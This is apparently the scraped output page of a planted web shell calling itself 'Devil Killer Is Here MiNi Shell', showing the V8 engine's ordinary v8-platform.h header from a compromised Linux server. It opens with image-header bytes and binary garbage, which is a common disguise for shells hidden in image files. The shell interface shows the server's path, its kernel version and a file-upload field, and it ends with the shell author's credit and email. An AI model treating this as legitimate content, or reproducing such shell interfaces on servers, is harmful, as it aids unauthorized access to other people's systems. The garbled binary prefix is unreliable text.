JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /usr/include/node/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //usr/include/node/v8-platform.h

// Copyright 2013 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef V8_V8_PLATFORM_H_
#define V8_V8_PLATFORM_H_

#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>  // For abort.
#include <memory>
#include <string>

#include "v8config.h"  // NOLINT(build/include_directory)

namespace v8 {

class Isolate;

// Valid priorities supported by the task scheduling infrastructure.
enum class TaskPriority : uint8_t {
  /**
   * Best effort tasks are not critical for performance of the application. The
   * platform implementation should preempt such tasks if higher priority tasks
   * arrive.
   */
  kBestEffort,
  /**
   * User visible tasks are long running background tasks that will
   * improve performance and memory usage of the application upon completion.
   * Example: background compilation and garbage collection.
   */
  kUserVisible,
  /**
   * User blocking tasks are highest priority tasks that block the execution
   * thread (e.g. major garbage collection). They must be finished as soon as
   * possible.
   */
  kUserBlocking,
};

/**
 * A Task represents a unit of work.
 */
class Task {
 public:
  virtual ~Task() = default;

  virtual void Run() = 0;
};

/**
 * An IdleTask represents a unit of work to be performed in idle time.
 * The Run method is invoked with an argument that specifies the deadline in
 * seconds returned by MonotonicallyIncreasingTime().
 * The idle task is expected to complete by this deadline.
 */
class IdleTask {
 public:
  virtual ~IdleTask() = default;
  virtual void Run(double deadline_in_seconds) = 0;
};

/**
 * A TaskRunner allows scheduling of tasks. The TaskRunner may still be used to
 * post tasks after the isolate gets destructed, but these tasks may not get
 * executed anymore. All tasks posted to a given TaskRunner will be invoked in
 * sequence. Tasks can be posted from any thread.
 */
class TaskRunner {
 public:
  /**
   * Schedules a task to be invoked by this TaskRunner. The TaskRunner
   * implementation takes ownership of |task|.
   */
  virtual void PostTask(std::unique_ptr<Task> task) = 0;

  /**
   * Schedules a task to be invoked by this TaskRunner. The TaskRunner
   * implementation takes ownership of |task|. The |task| cannot be nested
   * within other task executions.
   *
   * Tasks which shouldn't be interleaved with JS execution must be posted with
   * |PostNonNestableTask| or |PostNonNestableDelayedTask|. This is because the
   * embedder may process tasks in a callback which is called during JS
   * execution.
   *
   * In particular, tasks which execute JS must be non-nestable, since JS
   * execution is not allowed to nest.
   *
   * Requires that |TaskRunner::NonNestableTasksEnabled()| is true.
   */
  virtual void PostNonNestableTask(std::unique_ptr<Task> task) {}

  /**
   * Schedules a task to be invoked by this TaskRunner. The task is scheduled
   * after the given number of seconds |delay_in_seconds|. The TaskRunner
   * implementation takes ownership of |task|.
   */
  virtual void PostDelayedTask(std::unique_ptr<Task> task,
                               double delay_in_seconds) = 0;

  /**
   * Schedules a task to be invoked by this TaskRunner. The task is scheduled
   * after the given number of seconds |delay_in_seconds|. The TaskRunner
   * implementation takes ownership of |task|. The |task| cannot be nested
   * within other task executions.
   *
   * Tasks which shouldn't be interleaved with JS execution must be posted with
   * |PostNonNestableTask| or |PostNonNestableDelayedTask|. This is because the
   * embedder may process tasks in a callback which is called during JS
   * execution.
   *
   * In particular, tasks which execute JS must be non-nestable, since JS
   * execution is not allowed to nest.
   *
   * Requires that |TaskRunner::NonNestableDelayedTasksEnabled()| is true.
   */
  virtual void PostNonNestableDelayedTask(std::unique_ptr<Task> task,
                                          double delay_in_seconds) {}

  /**
   * Schedules an idle task to be invoked by this TaskRunner. The task is
   * scheduled when the embedder is idle. Requires that
   * |TaskRunner::IdleTasksEnabled()| is true. Idle tasks may be reordered
   * relative to other task types and may be starved for an arbitrarily long
   * time if no idle time is available. The TaskRunner implementation takes
   * ownership of |task|.
   */
  virtual void PostIdleTask(std::unique_ptr<IdleTask> task) = 0;

  /**
   * Returns true if idle tasks are enabled for this TaskRunner.
   */
  virtual bool IdleTasksEnabled() = 0;

  /**
   * Returns true if non-nestable tasks are enabled for this TaskRunner.
   */
  virtual bool NonNestableTasksEnabled() const { return false; }

  /**
   * Returns true if non-nestable delayed tasks are enabled for this TaskRunner.
   */
  virtual bool NonNestableDelayedTasksEnabled() const { return false; }

  TaskRunner() = default;
  virtual ~TaskRunner() = default;

  TaskRunner(const TaskRunner&) = delete;
  TaskRunner& operator=(const TaskRunner&) = delete;
};

/**
 * Delegate that's passed to Job's worker task, providing an entry point to
 * communicate with the scheduler.
 */
class JobDelegate {
 public:
  /**
   * Returns true if this thread should return from the worker task on the
   * current thread ASAP. Workers should periodically invoke ShouldYield (or
   * YieldIfNeeded()) as often as is reasonable.
   */
  virtual bool ShouldYield() = 0;

  /**
   * Notifies the scheduler that max concurrency was increased, and the number
   * of worker should be adjusted accordingly. See Platform::PostJob() for more
   * details.
   */
  virtual void NotifyConcurrencyIncrease() = 0;

  /**
   * Returns a task_id unique among threads currently running this job, such
   * that GetTaskId() < worker count. To achieve this, the same task_id may be
   * reused by a different thread after a worker_task returns.
   */
  virtual uint8_t GetTaskId() = 0;

  /**
   * Returns true if the current task is called from the thread currently
   * running JobHandle::Join().
   * TODO(etiennep): Make pure virtual once custom embedders implement it.
   */
  virtual bool IsJoiningThread() const { return false; }
};

/**
 * Handle returned when posting a Job. Provides methods to control execution of
 * the posted Job.
 */
class JobHandle {
 public:
  virtual ~JobHandle() = default;

  /**
   * Notifies the scheduler that max concurrency was increased, and the number
   * of worker should be adjusted accordingly. See Platform::PostJob() for more
   * details.
   */
  virtual void NotifyConcurrencyIncrease() = 0;

  /**
   * Contributes to the job on this thread. Doesn't return until all tasks have
   * completed and max concurrency becomes 0. When Join() is called and max
   * concurrency reaches 0, it should not increase again. This also promotes
   * this Job's priority to be at least as high as the calling thread's
   * priority.
   */
  virtual void Join() = 0;

  /**
   * Forces all existing workers to yield ASAP. Waits until they have all
   * returned from the Job's callback before returning.
   */
  virtual void Cancel() = 0;

  /*
   * Forces all existing workers to yield ASAP but doesn’t wait for them.
   * Warning, this is dangerous if the Job's callback is bound to or has access
   * to state which may be deleted after this call.
   * TODO(etiennep): Cleanup once implemented by all embedders.
   */
  virtual void CancelAndDetach() { Cancel(); }

  /**
   * Returns true if there's any work pending or any worker running.
   */
  virtual bool IsActive() = 0;

  // TODO(etiennep): Clean up once all overrides are removed.
  V8_DEPRECATED("Use !IsActive() instead.")
  virtual bool IsCompleted() { return !IsActive(); }

  /**
   * Returns true if associated with a Job and other methods may be called.
   * Returns false after Join() or Cancel() was called. This may return true
   * even if no workers are running and IsCompleted() returns true
   */
  virtual bool IsValid() = 0;

  // TODO(etiennep): Clean up once all overrides are removed.
  V8_DEPRECATED("Use IsValid() instead.")
  virtual bool IsRunning() { return IsValid(); }

  /**
   * Returns true if job priority can be changed.
   */
  virtual bool UpdatePriorityEnabled() const { return false; }

  /**
   *  Update this Job's priority.
   */
  virtual void UpdatePriority(TaskPriority new_priority) {}
};

/**
 * A JobTask represents work to run in parallel from Platform::PostJob().
 */
class JobTask {
 public:
  virtual ~JobTask() = default;

  virtual void Run(JobDelegate* delegate) = 0;

  /**
   * Controls the maximum number of threads calling Run() concurrently, given
   * the number of threads currently assigned to this job and executing Run().
   * Run() is only invoked if the number of threads previously running Run() was
   * less than the value returned. Since GetMaxConcurrency() is a leaf function,
   * it must not call back any JobHandle methods.
   */
  virtual size_t GetMaxConcurrency(size_t worker_count) const = 0;

  // TODO(1114823): Clean up once all overrides are removed.
  V8_DEPRECATED("Use the version that takes |worker_count|.")
  virtual size_t GetMaxConcurrency() const { return 0; }
};

/**
 * The interface represents complex arguments to trace events.
 */
class ConvertableToTraceFormat {
 public:
  virtual ~ConvertableToTraceFormat() = default;

  /**
   * Append the class info to the provided |out| string. The appended
   * data must be a valid JSON object. Strings must be properly quoted, and
   * escaped. There is no processing applied to the content after it is
   * appended.
   */
  virtual void AppendAsTraceFormat(std::string* out) const = 0;
};

/**
 * V8 Tracing controller.
 *
 * Can be implemented by an embedder to record trace events from V8.
 */
class TracingController {
 public:
  virtual ~TracingController() = default;

  // In Perfetto mode, trace events are written using Perfetto's Track Event
  // API directly without going through the embedder. However, it is still
  // possible to observe tracing being enabled and disabled.
#if !defined(V8_USE_PERFETTO)
  /**
   * Called by TRACE_EVENT* macros, don't call this directly.
   * The name parameter is a category group for example:
   * TRACE_EVENT0("v8,parse", "V8.Parse")
   * The pointer returned points to a value with zero or more of the bits
   * defined in CategoryGroupEnabledFlags.
   **/
  virtual const uint8_t* GetCategoryGroupEnabled(const char* name) {
    static uint8_t no = 0;
    return &no;
  }

  /**
   * Adds a trace event to the platform tracing system. These function calls are
   * usually the result of a TRACE_* macro from trace_event_common.h when
   * tracing and the category of the particular trace are enabled. It is not
   * advisable to call these functions on their own; they are really only meant
   * to be used by the trace macros. The returned handle can be used by
   * UpdateTraceEventDuration to update the duration of COMPLETE events.
   */
  virtual uint64_t AddTraceEvent(
      char phase, const uint8_t* category_enabled_flag, const char* name,
      const char* scope, uint64_t id, uint64_t bind_id, int32_t num_args,
      const char** arg_names, const uint8_t* arg_types,
      const uint64_t* arg_values,
      std::unique_ptr<ConvertableToTraceFormat>* arg_convertables,
      unsigned int flags) {
    return 0;
  }
  virtual uint64_t AddTraceEventWithTimestamp(
      char phase, const uint8_t* category_enabled_flag, const char* name,
      const char* scope, uint64_t id, uint64_t bind_id, int32_t num_args,
      const char** arg_names, const uint8_t* arg_types,
      const uint64_t* arg_values,
      std::unique_ptr<ConvertableToTraceFormat>* arg_convertables,
      unsigned int flags, int64_t timestamp) {
    return 0;
  }

  /**
   * Sets the duration field of a COMPLETE trace event. It must be called with
   * the handle returned from AddTraceEvent().
   **/
  virtual void UpdateTraceEventDuration(const uint8_t* category_enabled_flag,
                                        const char* name, uint64_t handle) {}
#endif  // !defined(V8_USE_PERFETTO)

  class TraceStateObserver {
   public:
    virtual ~TraceStateObserver() = default;
    virtual void OnTraceEnabled() = 0;
    virtual void OnTraceDisabled() = 0;
  };

  /** Adds tracing state change observer. */
  virtual void AddTraceStateObserver(TraceStateObserver*) {}

  /** Removes tracing state change observer. */
  virtual void RemoveTraceStateObserver(TraceStateObserver*) {}
};

/**
 * A V8 memory page allocator.
 *
 * Can be implemented by an embedder to manage large host OS allocations.
 */
class PageAllocator {
 public:
  virtual ~PageAllocator() = default;

  /**
   * Gets the page granularity for AllocatePages and FreePages. Addresses and
   * lengths for those calls should be multiples of AllocatePageSize().
   */
  virtual size_t AllocatePageSize() = 0;

  /**
   * Gets the page granularity for SetPermissions and ReleasePages. Addresses
   * and lengths for those calls should be multiples of CommitPageSize().
   */
  virtual size_t CommitPageSize() = 0;

  /**
   * Sets the random seed so that GetRandomMmapAddr() will generate repeatable
   * sequences of random mmap addresses.
   */
  virtual void SetRandomMmapSeed(int64_t seed) = 0;

  /**
   * Returns a randomized address, suitable for memory allocation under ASLR.
   * The address will be aligned to AllocatePageSize.
   */
  virtual void* GetRandomMmapAddr() = 0;

  /**
   * Memory permissions.
   */
  enum Permission {
    kNoAccess,
    kRead,
    kReadWrite,
    kReadWriteExecute,
    kReadExecute,
    // Set this when reserving memory that will later require kReadWriteExecute
    // permissions. The resulting behavior is platform-specific, currently
    // this is used to set the MAP_JIT flag on Apple Silicon.
    // TODO(jkummerow): Remove this when Wasm has a platform-independent
    // w^x implementation.
    kNoAccessWillJitLater
  };

  /**
   * Allocates memory in range with the given alignment and permission.
   */
  virtual void* AllocatePages(void* address, size_t length, size_t alignment,
                              Permission permissions) = 0;

  /**
   * Frees memory in a range that was allocated by a call to AllocatePages.
   */
  virtual bool FreePages(void* address, size_t length) = 0;

  /**
   * Releases memory in a range that was allocated by a call to AllocatePages.
   */
  virtual bool ReleasePages(void* address, size_t length,
                            size_t new_length) = 0;

  /**
   * Sets permissions on pages in an allocated range.
   */
  virtual bool SetPermissions(void* address, size_t length,
                              Permission permissions) = 0;

  /**
   * Frees memory in the given [address, address + size) range. address and size
   * should be operating system page-aligned. The next write to this
   * memory area brings the memory transparently back.
   */
  virtual bool DiscardSystemPages(void* address, size_t size) { return true; }

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   */
  class SharedMemoryMapping {
   public:
    // Implementations are expected to free the shared memory mapping in the
    // destructor.
    virtual ~SharedMemoryMapping() = default;
    virtual void* GetMemory() const = 0;
  };

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   */
  class SharedMemory {
   public:
    // Implementations are expected to free the shared memory in the destructor.
    virtual ~SharedMemory() = default;
    virtual std::unique_ptr<SharedMemoryMapping> RemapTo(
        void* new_address) const = 0;
    virtual void* GetMemory() const = 0;
    virtual size_t GetSize() const = 0;
  };

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   *
   * Reserve pages at a fixed address returning whether the reservation is
   * possible. The reserved memory is detached from the PageAllocator and so
   * should not be freed by it. It's intended for use with
   * SharedMemory::RemapTo, where ~SharedMemoryMapping would free the memory.
   */
  virtual bool ReserveForSharedMemoryMapping(void* address, size_t size) {
    return false;
  }

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   *
   * Allocates shared memory pages. Not all PageAllocators need support this and
   * so this method need not be overridden.
   * Allocates a new read-only shared memory region of size |length| and copies
   * the memory at |original_address| into it.
   */
  virtual std::unique_ptr<SharedMemory> AllocateSharedPages(
      size_t length, const void* original_address) {
    return {};
  }

  /**
   * INTERNAL ONLY: This interface has not been stabilised and may change
   * without notice from one release to another without being deprecated first.
   *
   * If not overridden and changed to return true, V8 will not attempt to call
   * AllocateSharedPages or RemapSharedPages. If overridden, AllocateSharedPages
   * and RemapSharedPages must also be overridden.
   */
  virtual bool CanAllocateSharedPages() { return false; }
};

/**
 * V8 Platform abstraction layer.
 *
 * The embedder has to provide an implementation of this interface before
 * initializing the rest of V8.
 */
class Platform {
 public:
  virtual ~Platform() = default;

  /**
   * Allows the embedder to manage memory page allocations.
   */
  virtual PageAllocator* GetPageAllocator() {
    // TODO(bbudge) Make this abstract after all embedders implement this.
    return nullptr;
  }

  /**
   * Enables the embedder to respond in cases where V8 can't allocate large
   * blocks of memory. V8 retries the failed allocation once after calling this
   * method. On success, execution continues; otherwise V8 exits with a fatal
   * error.
   * Embedder overrides of this function must NOT call back into V8.
   */
  virtual void OnCriticalMemoryPressure() {
    // TODO(bbudge) Remove this when embedders override the following method.
    // See crbug.com/634547.
  }

  /**
   * Enables the embedder to respond in cases where V8 can't allocate large
   * memory regions. The |length| parameter is the amount of memory needed.
   * Returns true if memory is now available. Returns false if no memory could
   * be made available. V8 will retry allocations until this method returns
   * false.
   *
   * Embedder overrides of this function must NOT call back into V8.
   */
  virtual bool OnCriticalMemoryPressure(size_t length) { return false; }

  /**
   * Gets the number of worker threads used by
   * Call(BlockingTask)OnWorkerThread(). This can be used to estimate the number
   * of tasks a work package should be split into. A return value of 0 means
   * that there are no worker threads available. Note that a value of 0 won't
   * prohibit V8 from posting tasks using |CallOnWorkerThread|.
   */
  virtual int NumberOfWorkerThreads() = 0;

  /**
   * Returns a TaskRunner which can be used to post a task on the foreground.
   * The TaskRunner's NonNestableTasksEnabled() must be true. This function
   * should only be called from a foreground thread.
   */
  virtual std::shared_ptr<v8::TaskRunner> GetForegroundTaskRunner(
      Isolate* isolate) = 0;

  /**
   * Schedules a task to be invoked on a worker thread.
   */
  virtual void CallOnWorkerThread(std::unique_ptr<Task> task) = 0;

  /**
   * Schedules a task that blocks the main thread to be invoked with
   * high-priority on a worker thread.
   */
  virtual void CallBlockingTaskOnWorkerThread(std::unique_ptr<Task> task) {
    // Embedders may optionally override this to process these tasks in a high
    // priority pool.
    CallOnWorkerThread(std::move(task));
  }

  /**
   * Schedules a task to be invoked with low-priority on a worker thread.
   */
  virtual void CallLowPriorityTaskOnWorkerThread(std::unique_ptr<Task> task) {
    // Embedders may optionally override this to process these tasks in a low
    // priority pool.
    CallOnWorkerThread(std::move(task));
  }

  /**
   * Schedules a task to be invoked on a worker thread after |delay_in_seconds|
   * expires.
   */
  virtual void CallDelayedOnWorkerThread(std::unique_ptr<Task> task,
                                         double delay_in_seconds) = 0;

  /**
   * Returns true if idle tasks are enabled for the given |isolate|.
   */
  virtual bool IdleTasksEnabled(Isolate* isolate) { return false; }

  /**
   * Posts |job_task| to run in parallel. Returns a JobHandle associated with
   * the Job, which can be joined or canceled.
   * This avoids degenerate cases:
   * - Calling CallOnWorkerThread() for each work item, causing significant
   *   overhead.
   * - Fixed number of CallOnWorkerThread() calls that split the work and might
   *   run for a long time. This is problematic when many components post
   *   "num cores" tasks and all expect to use all the cores. In these cases,
   *   the scheduler lacks context to be fair to multiple same-priority requests
   *   and/or ability to request lower priority work to yield when high priority
   *   work comes in.
   * A canonical implementation of |job_task| looks like:
   * class MyJobTask : public JobTask {
   *  public:
   *   MyJobTask(...) : worker_queue_(...) {}
   *   // JobTask:
   *   void Run(JobDelegate* delegate) override {
   *     while (!delegate->ShouldYield()) {
   *       // Smallest unit of work.
   *       auto work_item = worker_queue_.TakeWorkItem(); // Thread safe.
   *       if (!work_item) return;
   *       ProcessWork(work_item);
   *     }
   *   }
   *
   *   size_t GetMaxConcurrency() const override {
   *     return worker_queue_.GetSize(); // Thread safe.
   *   }
   * };
   * auto handle = PostJob(TaskPriority::kUserVisible,
   *                       std::make_unique<MyJobTask>(...));
   * handle->Join();
   *
   * PostJob() and methods of the returned JobHandle/JobDelegate, must never be
   * called while holding a lock that could be acquired by JobTask::Run or
   * JobTask::GetMaxConcurrency -- that could result in a deadlock. This is
   * because [1] JobTask::GetMaxConcurrency may be invoked while holding
   * internal lock (A), hence JobTask::GetMaxConcurrency can only use a lock (B)
   * if that lock is *never* held while calling back into JobHandle from any
   * thread (A=>B/B=>A deadlock) and [2] JobTask::Run or
   * JobTask::GetMaxConcurrency may be invoked synchronously from JobHandle
   * (B=>JobHandle::foo=>B deadlock).
   *
   * A sufficient PostJob() implementation that uses the default Job provided in
   * libplatform looks like:
   *  std::unique_ptr<JobHandle> PostJob(
   *      TaskPriority priority, std::unique_ptr<JobTask> job_task) override {
   *    return v8::platform::NewDefaultJobHandle(
   *        this, priority, std::move(job_task), NumberOfWorkerThreads());
   * }
   */
  virtual std::unique_ptr<JobHandle> PostJob(
      TaskPriority priority, std::unique_ptr<JobTask> job_task) = 0;

  /**
   * Monotonically increasing time in seconds from an arbitrary fixed point in
   * the past. This function is expected to return at least
   * millisecond-precision values. For this reason,
   * it is recommended that the fixed point be no further in the past than
   * the epoch.
   **/
  virtual double MonotonicallyIncreasingTime() = 0;

  /**
   * Current wall-clock time in milliseconds since epoch.
   * This function is expected to return at least millisecond-precision values.
   */
  virtual double CurrentClockTimeMillis() = 0;

  typedef void (*StackTracePrinter)();

  /**
   * Returns a function pointer that print a stack trace of the current stack
   * on invocation. Disables printing of the stack trace if nullptr.
   */
  virtual StackTracePrinter GetStackTracePrinter() { return nullptr; }

  /**
   * Returns an instance of a v8::TracingController. This must be non-nullptr.
   */
  virtual TracingController* GetTracingController() = 0;

  /**
   * Tells the embedder to generate and upload a crashdump during an unexpected
   * but non-critical scenario.
   */
  virtual void DumpWithoutCrashing() {}

 protected:
  /**
   * Default implementation of current wall-clock time in milliseconds
   * since epoch. Useful for implementing |CurrentClockTimeMillis| if
   * nothing special needed.
   */
  V8_EXPORT static double SystemClockTimeMillis();
};

}  // namespace v8

#endif  // V8_V8_PLATFORM_H_

Creat By MiNi SheLL
Email: jattceo@gmail.com